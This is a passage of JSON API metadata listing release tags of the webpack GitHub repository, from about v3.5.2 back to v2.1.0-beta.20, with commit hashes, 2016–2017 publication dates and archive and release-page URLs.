s/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","publ